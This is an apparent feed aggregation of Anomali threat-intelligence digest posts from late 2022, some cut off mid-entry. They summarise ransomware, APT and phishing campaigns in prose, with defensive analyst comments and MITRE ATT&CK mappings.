unauthorized modification of user permissions, unauthorized modifications to the crontab, and other known signs of APT5’s activities. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 Tags: actor:APT5, actor:UNC2630, actor:Manganese, actor:Keyhole Panda, CVE-2022-27518, CTX474995, Citrix ADC, Citrix Gateway, Zero-day, China, source-country:CN Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT (published: December 12, 2022) In November 2022, a new cryptojacking campaign was detected by Trend Micro researchers. Unlike previously-recorded campaigns that aim at installing a cryptomining software, this one is utilizing a remote access trojan (RAT): a Linux-targeting version of the open-source Chaos RAT. This Go-based RAT is multi-functional and has the ability to download additional files, run a reverse shell, and take screenshots. Analyst Comment: Implement timely patching and updating to your systems. Monitor for a sudden increase in resource utilization, track open ports, and check the usage of and changes made to DNS routing. MITRE ATT&CK: [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Network Service Scanning - T1046 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Screen Capture - T1113 | [MITRE ATT&CK] Remote Access Tools - T12]]> 2022-12-20T20:46:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt5-exploited-citrix-zero-days-azov-data-wiper-features-advanced-anti-analysis-techniques-inception-apt-targets-russia-controlled-territories-and-more www.secnews.physaphae.fr/article.php?IdArticle=8295338 False Malware,Tool,Vulnerability,Threat,Patching,Prediction APT 5 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New MuddyWater Threat: Old Kitten; New Tricks (published: December 8, 2022) In 2020-2022, Iran-sponsored MuddyWater (Static Kitten, Mercury) group went through abusing several legitimate remote administration tools: RemoteUtilities, followed by ScreenConnect and then Atera Agent. Since September 2022, a new campaign attributed to MuddyWater uses spearphishing to deliver links to archived MSI files with yet another remote administration tool: Syncro. Deep Instinct researchers observed the targeting of Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and United Arab Emirates. Analyst Comment: Network defenders are advised to establish a baseline for typical running processes and monitor for remote desktop solutions that are not common in the organization. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Remote Access Tools - T1219 Tags: mitre-group:MuddyWater, actor:Static Kitten, actor:Mercury, Iran, source-country:IR, APT, Cyberespionage, Ministry of Intelligence and Security, detection:Syncro, malware-type:RAT, file-type:MSI, file-type:ZIP, OneHub, Windows Babuk Ransomware Variant in Major New Attack (published: December 7, 2022) In November 2022, Morphisec researchers identified a new ransomware variant based on the Babuk source code that was leaked in 2021. One modification is lowering detection by abusing the legitimate Microsoft signed process: DLL side-loading into NTSD.exe — a Symbolic Debugger tool for Windows. The mechanism to remove the available Shadow Copies was changed to using Component Object Model objects that execute Windows Management Instrumentation queries. This sample was detected in a large, unnamed manufacturing company where attackers had network access and were gathering information for two weeks. They have compromised the company’s domain controller and used it to distribute ransomware to all devices within the organization through Group Policy Object. The delivered BAT script bypasses User Account Control and executes a malicious MSI file that contains files for DLL side-loading and an open-source-based reflective loader (OCS files). Analyst Comment: The attackers strive to improve their evasion techniques, their malware on certain steps hides behind Microsoft-signed processes and exists primarily in device memory. It increases the need for the defense-in-depth approach and robust monitoring of your organization domain. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Abuse Elevation Control Mechanism - T1548 | [MITRE ATT&CK] Hijack Execution Flow - T1574 | ]]> 2022-12-13T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-muddywater-hides-behind-legitimate-remote-administration-tools-vice-society-tops-ransomware-threats-to-education-abandoned-javascript-library-domain-pushes-web-skimmers www.secnews.physaphae.fr/article.php?IdArticle=8290724 False Ransomware,Malware,Tool,Threat,Medical APT 38 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Chinese Gambling Spam Targets World Cup Keywords (published: December 2, 2022) Since 2018, a large-scale website infection campaign was affecting up to over 100,000 sites at a given moment. Infected websites, mostly oriented at audiences in China, were modified with additional scripts. Compromised websites were made to redirect users to Chinese gambling sites. Title and Meta tags on the compromised websites were changed to display keywords that the attackers had chosen to abuse search engine optimization (SEO). At the same time, additional scripts were switching the page titles back to the original if the visitor fingerprinting did not show a Chinese search engine from a preset list (such as Baidu). Analyst Comment: Website owners should keep their systems updated, use unique strong passwords and introduce MFA for all privileged or internet facing resources, and employ server-side scanning to detect unauthorized malicious content. Implement secure storage for website backups. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 Tags: SEO hack, HTML entities, Black hat SEO, Fraudulent redirects, Visitor fingerprinting, Gambling, Sports betting, World Cup, China, target-country:CN, JavaScript, Baidu, baiduspider, Sogou, 360spider, Yisou Leaked Android Platform Certificates Create Risks for Users (published: December 2, 2022) On November 30, 2022, Google reported 10 different Android platform certificates that were seen actively abused in the wild to sign malware. Rapid7 researchers found that the reported signed samples are adware, so it is possible that these platform certificates may have been widely available. It is not shared how these platform certificates could have been leaked. Analyst Comment: Malware signed with a platform certificate can enjoy privileged execution with system permissions, including permissions to access user data. Developers should minimize the number of applications requiring a platform certificate signature. Tags: Android, Google, Platform certificates, Signed malware, malware-type:Adware Blowing Cobalt Strike Out of the Water With Memory Analysis (published: December 2, 2022) The Cobalt Strike attack framework remains difficult to detect as it works mostly in memory and doesn’t touch the disk much after the initial loader stage. Palo Alto researchers analyzed three types of Cobalt Strike loaders: KoboldLoader which loads an SMB beacon, MagnetLoader loading an HTTPS beacon, and LithiumLoader loading a stager beacon. These beacon samples do not execute in normal sandbox environments and utilize in-me]]> 2022-12-06T17:09:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-infected-websites-show-different-headers-depending-on-search-engine-fingerprinting-10-android-platform-certificates-abused-in-the-wild-phishing-group-impersonated-major-uae-oil www.secnews.physaphae.fr/article.php?IdArticle=8288335 False Spam,Malware,Tool,Threat,Medical APT 38 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Voice-Scamming Site “iSpoof” Seized, 100s Arrested in Massive Crackdown (published: November 25, 2022) iSpoof was a threat group offering spoofing for caller phone numbers (also known as Caller ID, Calling Line Identification). iSpoof core group operated out of the UK with presence in other countries. In the 12 months until August 2022 around 10 million fraudulent calls were made globally via iSpoof. On November 24, 2022, Europol announced a joint operation involving Australia, Canada, France, Germany, Ireland, Lithuania, Netherlands, Ukraine, the UK, and the USA, that led to the arrest of 142 suspects and seizure of iSpoof websites. Analyst Comment: Threat actors can spoof Caller ID (Calling Line Identification) similar to spoofing the “From:” header in an email. If contacted by an organization you should not confirm any details about yourself, take the caller’s details, disconnect and initiate a call back to the organization yourself using a trusted number. Legitimate organizations understand scams and fraud and do not engage in unsolicited calling. Tags: iSpoof, Teejai Fletcher, United Kingdom, source-country:UK, Caller ID, Calling Line Identification, Voice-scamming, Social engineering New Ransomware Attacks in Ukraine Linked to Russian Sandworm Hackers (published: November 25, 2022) On November 21, 2022, multiple organizations in Ukraine were targeted with new ransomware written in .NET. It was dubbed RansomBoggs by ESET researchers who attributed it to the Russia-sponsored Sandworm Team (aka Iridium, BlackEnergy). Sandworm distributed RansomBoggs from the domain controller using the same PowerShell script (PowerGap) that was seen in its previous attacks. RansomBoggs encrypts files using AES-256 in CBC mode using a randomly generated key. The key is RSA encrypted prior to storage and the encrypted files are appended with a .chsch extension. Analyst Comment: Ransomware remains one of the most dangerous types of malware threats and even some government-sponsored groups are using it. Sandworm is a very competent actor group specializing in these forms of attack. Organizations with exposure to the military conflict in Ukraine, or considered by the Russian state to be providing support relating to the conflict, should prepare offline backups to minimize the effects of a potential data-availability-denial attack. MITRE ATT&CK: [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 Tags: detection:RansomBoggs, detection:Filecoder.Sullivan, malware-type:Ransomware, AES-256, PowerShell, detection:PowerGap, mitre-group:Sandworm Team, actor:Iridium, Russia]]> 2022-11-29T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-caller-id-spoofing-actors-arrested-fast-moving-qakbot-infection-deploys-black-basta-ransomware-new-yara-rules-to-detect-cobalt-strike-and-more www.secnews.physaphae.fr/article.php?IdArticle=8282165 False Ransomware,Malware,Tool,Threat,Guideline None 4.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence DEV-0569 Finds New Ways to Deliver Royal Ransomware, Various Payloads (published: November 17, 2022) From August to October, 2022, Microsoft researchers detected new campaigns by a threat group dubbed DEV-0569. For delivery, the group alternated between delivering malicious links by abusing Google Ads for malvertising and by using contact forms on targeted organizations’ public websites. Fake installer files were hosted on typosquatted domains or legitimate repositories (GitHub, OneDrive). First stage was user-downloaded, signed MSI or VHD file (BatLoader malware), leading to second stage payloads such as BumbleBee, Gozi, Royal Ransomware, or Vidar Stealer. Analyst Comment: DEV-0569 is a dangerous group for its abuse of legitimate services and legitimate certificates. Organizations should consider educating and limiting their users regarding software installation options. Links from alternative incoming messaging such as from contact forms should be treated as thorough as links from incoming email traffic. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Impair Defenses - T1562 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: actor:DEV-0569, detection:Cobalt Strike, detection:Royal, malware-type:Ransomware, file-type:VHD, detection:NSudo, malware-type:Hacktool, detection:IcedID, Google Ads, Keitaro, Traffic distribution system, detection:Gozi, detection:BumbleBee, NirCmd, detection:BatLoader, malware-type:Loader, detection:Vidar, malware-type:Stealer, AnyDesk, GitHub, OneDrive, PowerShell, Phishing, SEO poisoning, TeamViewer, Adobe Flash Player, Zoom, Windows Highly Sophisticated Phishing Scams Are Abusing Holiday Sentiment (published: November 16, 2022) From mid-September 2022, a new phishing campaign targets users in North America with holiday special pretenses. It impersonated a number of major brands including Costco, Delta Airlines, Dick's, and Sam's Club. Akamai researchers analyzed techniques that the underlying sophisticated phishing kit was using. For defense evasion and tracking, the attackers used URI fragmentation. They were placing target-specific tokens after the URL fragment identifier (a hash mark, aka HTML anchor). The value was used by a JavaScript code running on the victim’s browser to reconstruct the redirecting URL. Analyst Comment: Evasion through URI fragmentation hides the token value from traff]]> 2022-11-22T23:47:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-uri-fragmentation-used-to-stealthily-defraud-holiday-shoppers-lazarus-and-billbug-stick-to-their-custom-backdoors-z-team-turned-ransomware-into-wiper-and-more www.secnews.physaphae.fr/article.php?IdArticle=8169179 False Ransomware,Malware,Tool,Threat,Guideline,Medical APT 38 4.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence KmsdBot: The Attack and Mine Malware (published: November 10, 2022) KmsdBot is a cryptominer written in GO with distributed denial-of-service (DDoS) functionality. This malware was performing DDoS attacks via either Layer 4 TCP/UDP packets or Layer 7 HTTP consisting of GET and POST. KmsdBot was seen performing targeted DDoS attacks against the gaming industry, luxury car manufacturers, and technology industry. The malware spreads by scanning for open SSH ports and trying a list of weak username and password combinations. Analyst Comment: Network administrators should not use weak or default credentials for servers or deployed applications. Keep your systems up-to-date and use public key authentication for your SSH connections. MITRE ATT&CK: [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Resource Hijacking - T1496 Tags: detection:KmsdBot, SSH, Winx86, Arm64, mips64, x86_64, malware-type:DDoS, malware-type:Cryptominer, xmrig, Monero, Golang, target-industry:Gaming, target-industry:Car manufacturing, target-industry:Technology, Layer 4, Layer 7 Massive ois[.]is Black Hat Redirect Malware Campaign (published: November 9, 2022) Since September 2022, a new WordPress malware redirects website visitors via ois[.]is. To conceal itself from administrators, the redirect will not occur if the wordpress_logged_in cookie is present, or if the current page is wp-login.php. The malware infects .php files it finds – on average over 100 files infected per website. A .png image file is initiating a redirect using the window.location.href function to redirect to a Google search result URL of a spam domain of actors’ choice. Sucuri researchers estimate 15,000 affected websites that were redirecting visitors to fake Q&A sites. Analyst Comment: WordPress site administrators should keep their systems updated and secure the wp-admin administrator panel with 2FA or other access restrictions. If your site was infected, perform a core file integrity check, query for any files containing the same injection, and check any recently modified or added files. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 Tags: file-type:PHP, SEO poisoning, WordPress, Google Search, Google Ads LockBit 3.0 Being Distributed via Amadey Bot (published: November 8, 2022) Discovered in 2018, Amadey Bot is a commodity malware that functions as infostealer and loader. Ahnlab researchers detected a new campaign where it is used to deliver the LockBit 3.0 ransomware. It is likely a part of a larger 2022 campaign delivering LockBit to South Korean users. The actors used phishing attachments with two variants of Amadey B]]> 2022-11-16T03:26:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-amadey-bot-started-delivering-lockbit-30-ransomware-strelastealer-delivered-by-a-html-dll-polyglot-spymax-rat-variant-targeted-indian-defense-and-more www.secnews.physaphae.fr/article.php?IdArticle=8039573 False Ransomware,Spam,Malware,Tool,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Cobalt Strike Analysis and Tutorial: Identifying Beacon Team Servers in the Wild (published: November 3, 2022) Cobalt Strike remains a popular post-exploitation tool for threat actors trying to evade threat detection. Cobalt Strike’s Beacons use advanced, flexible command-and-control (C2) communication profiles for stealth communication with an attacker-controlled Linux application called Team Server. Beacon implants can covertly utilize the DNS protocol or communicate via HTTP/HTTPs using the the default Malleable C2 profile or Malleable C2 Gmail profile. Palo Alto researchers probed the Internet for these three types of communication to find previously-unknown active Team Server instances. Researchers were preselecting suspicious IP addresses with Shodan, actively probing them with stager requests and initializing a connection with the netcat tool to test, verify and extract communication profile settings (such as the served stager bytes). Analyst Comment: Network fingerprinting and active scanning technologies allow for proactive identification of threats such as Cobalt Strike’s C2 IP addresses. Network defenders and intelligence feed providers can get better coverage by improving their collaboration and coverage via threat intelligence platforms such as ThreatStream provided by Anomali. MITRE ATT&CK: [MITRE ATT&CK] Application Layer Protocol - T1071 Tags: detection:Cobalt Strike Beacon, detection:Cobalt Strike, detection:Cobalt Strike Team Server, Cobalt Strike stager, Active scanning, Shodan, netcat, Post-exploitation tool, Gmail, DNS, TCP, HTTP, Windows Abusing Microsoft Customer Voice to Send Phishing Links (published: November 3, 2022) Avanan researchers detected a phishing campaign that abuses Microsoft Dynamics 365 Customer Voice since at least September 2022. These phishing emails come from legitimate email address surveys@email.formspro.microsoft.com, and clicking the link opens the Microsoft’s Customer Voice domain on a page with URL starting with: customervoice.microsoft.com/Pages/ResponsePage.aspx?id=... At the same time, a user clicking on the embedded “Play Voicemail” link redirects to an attacker-controlled phishing page asking for Microsoft account login credentials. Analyst Comment: Organizations can use services like Anomali Digital Risk Protection, which defends your brand against brand abuse and continuously monitors domains for cybersquatters and domain hijacking to prevent phishing and malware attacks. Users are advised to always check the current domain by hovering over the URL, especially before entering credentials. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 Tags: Customer Voice, Phishing, Microsoft, Forms Pro Black Basta Ransomware]]> 2022-11-08T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-active-probing-revealed-cobalt-strike-c2s-black-basta-ransomware-connected-to-fin7-robin-banks-phishing-as-a-service-became-stealthier-and-more www.secnews.physaphae.fr/article.php?IdArticle=7890921 False Ransomware,Malware,Tool,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Threat Analysis: Active C2 Discovery Using Protocol Emulation Part3 (ShadowPad) (published: October 27, 2022) ShadowPad is a custom, modular malware in use by multiple China-sponsored groups since 2015. VMware researchers analyzed the command-and-control (C2) protocol in recent ShadowPad samples. They uncovered decoding routines and protocol/port combinations such as HTTP/80, HTTP/443, TCP/443, UDP/53, and UDP/443. Active probing revealed 83 likely ShadowPad C2 servers (during September 2021 to September 2022). Additional samples communicating with this infrastructure included Spyder (used by APT41) and ReverseWindow (used by the LuoYu group). Analyst Comment: Researchers can use reverse engineering and active probing to map malicious C2 infrastructure. At the same time, the ShadowPad malware changes the immediate values used in the packet encoding per variant, so finding new samples is crucial for this monitoring. MITRE ATT&CK: [MITRE ATT&CK] Application Layer Protocol - T1071 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 Tags: detection:ShadowPad, C2, APT, China, source-country:CN, actor:APT41, actor:LuoYu, detection:Spyder, detection:ReverseWindow, TCP, HTTP, HTTPS, UDP Raspberry Robin Worm Part of Larger Ecosystem Facilitating Pre-Ransomware Activity (published: October 27, 2022) The Raspberry Robin USB-drive-targeting worm is an increasingly popular infection and delivery method. Raspberry Robin works as a three-file infection: Raspberry Robin LNK file on an USB drive, Raspberry Robin DLL (aka Roshtyak) backdoor, and a heavily-obfuscated .NET DLL that writes LNKs to USB drives. Microsoft researchers analyzed several infection chains likely centered around threat group EvilCorp (aka DEV-0206/DEV-0243). Besides being the initial infection vector, Raspberry Robin was seen delivered by the Fauppod malware, which shares certain code similarities both with Raspberry Robin and with EvilCorp’s Dridex malware. Fauppod/Raspberry Robin infections were followed by additional malware (Bumblebee, Cobalt Strike, IcedID, TrueBot), and eventually led to a ransomware infection (LockBit, Clop). Analyst Comment: Organizations are advised against enabling Autorun of removable media on Windows by default, as it allows automated activation of an inserted, Raspberry Robin-infected USB drive. Apply best practices related to credential hygiene, network segmentation, and attack surface reduction. MITRE ATT&CK: [MITRE ATT&CK] Replicat]]> 2022-11-01T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-active-probing-revealed-shadowpad-c2s-fodcha-hides-behind-obscure-tlds-awaiting-openssl-30-patch-and-more www.secnews.physaphae.fr/article.php?IdArticle=7765391 False Ransomware,Malware,Hack,Tool,Vulnerability,Threat,Guideline APT 41 None Anomali - Firm Blog [1] times faster than before due to the onset of the pandemic. The changes included customer interactions, employee engagement, back-office processes, supply chain, and more. It’s a cliché to state that cyber becomes a core business risk as businesses get more digitally connected. Scan the SEC filings of any publicly listed company, and it’s amply clear that digital transformation unlocks massive growth but also expands the risk profile for most organizations. Cyber resilience is business resilience. The corollary holds equally true – cyber fragility impedes business growth. Figure 1: Digital transformation & cyber risk The traditional approach to cybersecurity has focused on a tech-centric approach to security, evolving a technology acronym soup, continuously trying to find the smarter tool to speed up and scale security operations. This approach, somewhat successful at the lower levels of digital transformation, has become unmanageable and incredibly expensive for businesses. In spending time with board directors, management teams, CIOs, and CISOs, we’ve realized that there is a dire need to pause and reset the foundational thinking with an eye on more effective delivery that can scale at a manageable cost. When an attacker targets an organization, they start by first conducting reconnaissance and understanding a company’s business model, profile, and strategy. Security needs to focus on the WHY - the business context. Why are they an interesting target, and what can they do to deter the attackers? This fusion of business context with security is critical to transforming security for the modern enterprise and helping executives answer key questions on business risk and resilience. As Einstein aptly said, “we cannot solve our problems with the same thinking we used to create them.” Sprucing up Security Operations A recent ESG survey highlighted that 52% of security professionals consider security today more complex today than two years ago[2]. There are several drivers for this, including changing threat landscape, growing attack surface, higher volume and complexity of security alerts, growing adoption of public cloud services, keeping up with operational needs of SecOps technologies, and collecting and growing more data. Elevating security necessitates a step back first to understand the goal. “The core purpose of security operations in a business is to drive operational resilience and]]> 2022-10-26T18:31:00+00:00 https://www.anomali.com/blog/accelerating-security-resilience-at-a-fraction-of-the-cost www.secnews.physaphae.fr/article.php?IdArticle=7692043 False Tool,Threat,Guideline None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Alert (AA22-294A) #StopRansomware: Daixin Team (published: October 21, 2022) Daixin Team is a double-extortion ransomware group that has been targeting US businesses, predominantly in the healthcare sector. Since June 2022, Daixin Team has been encrypting electronic health record services, diagnostics services, imaging services, and intranet services. The group has exfiltrated personal identifiable information and patient health information. Typical intrusion starts with initial access through virtual private network (VPN) servers gained by exploitation or valid credentials derived from prior phishing. They use SSH and RDP for lateral movement and target VMware ESXi systems with ransomware based on leaked Babuk Locker source code. Analyst Comment: Network defenders should keep organization’s VPN servers up-to-date on security updates. Enable multifactor authentication (MFA) on your VPN server and other critical accounts (administrative, backup-related, and webmail). Restrict the use of RDP, SSH, Telnet, virtual desktop and similar services in your environment. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Remote Service Session Hijacking - T1563 | [MITRE ATT&CK] Use Alternate Authentication Material - T1550 | [MITRE ATT&CK] Exfiltration Over Web Service - T1567 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: actor:Daixin Team, malware-type:Ransomware, PHI, SSH, RDP, Rclone, Ngrok, target-sector:Health Care NAICS 62, ESXi, VMware, Windows Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool (published: October 21, 2022) Symantec detected a new custom data exfiltration tool used in a number of BlackByte ransomware attacks. This infostealer, dubbed Exbyte, performs anti-sandbox checks and proceeds to exfiltrate selected file types to a hardcoded Mega account. BlackByte ransomware-as-a-service operations were first uncovered in February 2022. The group’s recent attacks start with exploiting public-facing vulnerabilities of ProxyShell and ProxyLogon families. BlackByte removes Kernel Notify Routines to bypass Endpoint Detection and Response (EDR) products. The group uses AdFind, AnyDesk, Exbyte, NetScan, and PowerView tools and deploys BlackByte 2.0 ransomware payload. Analyst Comment: It is crucial that your company ensures that servers are]]> 2022-10-25T16:53:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-daixin-team-ransoms-healthcare-sector-earth-berberoka-breaches-casinos-for-data-windows-affected-by-bring-your-own-vulnerable-driver-attacks-and-more www.secnews.physaphae.fr/article.php?IdArticle=7673563 False Ransomware,Malware,Tool,Vulnerability,Threat,Medical APT 38 None Anomali - Firm Blog A new threat report is published from an intel provider describing a new variant of malware that has been catastrophic at similar organizations. This report would ideally contain information around the process tree, registry key, etc., to help the cyber threat hunters not just hunt for detection of the associated IOCs but dig deeper to identify patterns that match the behavior of the malware across the network, like abnormal PowerShell executio]]> 2022-10-20T13:36:00+00:00 https://www.anomali.com/blog/threat-hunting-eight-tactics-to-a-accelerating-threat-hunting www.secnews.physaphae.fr/article.php?IdArticle=7666507 False Spam,Malware,Tool,Vulnerability,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Ransom Cartel Ransomware: A Possible Connection With REvil (published: October 14, 2022) Palo Alto Networks researchers analyzed Ransom Cartel, a double extortion ransomware-as-a-service group. Ransom Cartel came to existence in mid-December 2021 after the REvil group shut down. The Ransom Cartel group uses the Ransom Cartel ransomware, which shares significant code similarities with REvil, indicating close connections, but lacks REvil obfuscation engine capabilities. Ransom Cartel has almost no obfuscation outside of the configuration: unlike REvil it does not use string encryption and API hashing. Among multiple tools utilized by Ransom Cartel, the DonPAPI credential dumper is unique for this group. It performs Windows Data Protection API (DPAPI) dumping by targeting DPAPI-protected credentials such as credentials saved in web browsers, RDP passwords, and Wi-Fi keys. Analyst Comment: Network defenders should consider monitoring or blocking high-risk connections such as TOR traffic that is often abused by Ransom Cartel and its affiliates. It is crucial that your company ensure that servers are always running the most current software version. Your company should have policies in place in regards to the proper configurations needed for your servers in order to conduct your business needs safely. MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Software Deployment Tools - T1072 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Boot or Logon Autostart Execution - T1547 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068 | [MITRE ATT&CK] File and Directory Permissions Modification - T1222 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE ATT&CK] Impair Defenses - T1562 | [MITRE ATT&CK] Indicator Removal on Host -]]> 2022-10-18T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-ransom-cartel-uses-dpapi-dumping-unknown-china-sponsored-group-targeted-telecommunications-alchimist-c2-framework-targets-multiple-operating-systems-and-more www.secnews.physaphae.fr/article.php?IdArticle=7541845 False Ransomware,Malware,Tool,Threat APT 27 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence VMware Report Exposes Emotet Malware’s Supply Chain (published: October 10, 2022) VMware researchers analyzed the Emotet malware-as-a-service evolution and its command-and-control (C2) infrastructure. In June 2022, Emotet added two new modules: one stealing credit card information from Google Chrome browsers, and another one that leverages the SMB protocol to spread laterally. Emotet’s main component is a DLL file that stores a highly obfuscated list of C2 IP:port pairs. More than half of the ports counted were port 8080 used as a proxy port on compromised legitimate servers abused to proxy traffic to the real C2 servers. Analyst Comment: For network defenders it is important to strengthen email security and implement network segmentation whenever possible. Despite its continuous evolution, Emotet botnets can reuse previously identified infrastructure. Block known network-based indicators available via Anomali platform. MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE ATT&CK] Signed Script Proxy Execution - T1216 | [MITRE ATT&CK] Encrypted Channel - T1573 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Email Collection - T1114 Tags: mitre-software:Emotet, mitre-group:Wizard Spider, SMB, Proxy, Botnet, Malware-as-a-service, Windows LofyGang Hackers Built a Credential-Stealing Enterprise on Discord, NPM (published: October 7, 2022) Checkmarx Security researchers described a financially-motivated threat actor group dubbed LofyGang (Lofy). This group aims at stealing credentials and credit card data by distributing approximately 200 malicious packages and fake hacking tools on code-hosting platforms, such as NPM and GitHub. LofyGang uses package name typosquatting and the starjacking technique of displaying fake popularity statistics. The first LofyGang package typically does not have a malicious behavior besides getting the second-stage malicious package. For its command-and-control communication the group often abuses legitimate services such as Discord, GitHub, glitch, Heroku, and Repl.it. Analyst Comment: Developers should be extra cautious and sensitized to the growing exploitation of the open source eco]]> 2022-10-12T18:06:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-emotet-added-two-new-modules-lofygang-distributed-200-malicious-packages-bumblebee-loader-expanded-its-reach-and-more www.secnews.physaphae.fr/article.php?IdArticle=7417719 False Ransomware,Malware,Tool,Threat None None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New Royal Ransomware Emerges in Multi-Million Dollar Attacks (published: September 29, 2022) AdvIntel and BleepingComputer researchers describe the Royal ransomware group. Several experienced ransomware actors formed this group in January 2022. It started with third-party encryptors such as BlackCat, switched to using its own custom Zeon ransomware, and, since the middle of September 2022, the Royal ransomware. Royal group utilizes targeted callback phishing attacks. Its phishing emails impersonating food delivery and software providers contained phone numbers to cancel the alleged subscription (after the alleged end of a free trial). If an employee calls the number, Royal uses social engineering to convince the victim to install a remote access tool, which is used to gain initial access to the corporate network. Analyst Comment: Use services such as Anomali's Premium Digital Risk Protection to detect the abuse of your brands in typosquatting and phishing attacks. Organizations should include callback phishing attacks awareness into their anti-phishing training. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Phishing - T1566 Tags: actor:Royal, detection:Zeon, detection:Royal, malware-type:Ransomware, detection:BlackCat, detection:Cobalt Strike, Callback phishing attacks, Spearphishing, Social Engineering ZINC Weaponizing Open-Source Software (published: September 29, 2022) Microsoft researchers described recent developments in Lazarus Group (ZINC) campaigns that start from social engineering conversations on LinkedIn. Since June 2022, Lazarus was able to trojanize several open-source tools (KiTTY, muPDF/Subliminal Recording software installer, PuTTY, TightVNC, and Sumatra PDF Reader). When a target extracts the trojanized tool from the ISO file and installs it, Lazarus is able to deliver their custom malware such as EventHorizon and ZetaNile. In many cases, the final payload was not delivered unless the target manually established an SSH connection to an attacker-controlled IP address provided in the attached ReadMe.txt file. Analyst Comment: All known indicators connected to this recent Lazarus Group campaign are available in the Anomali platform and customers are advised to block these on their infrastructure. Researchers should monitor for the additional User Execution step required for payload delivery. Defense contractors should be aware of advanced social engineering efforts abusing LinkedIn and other means of establishing 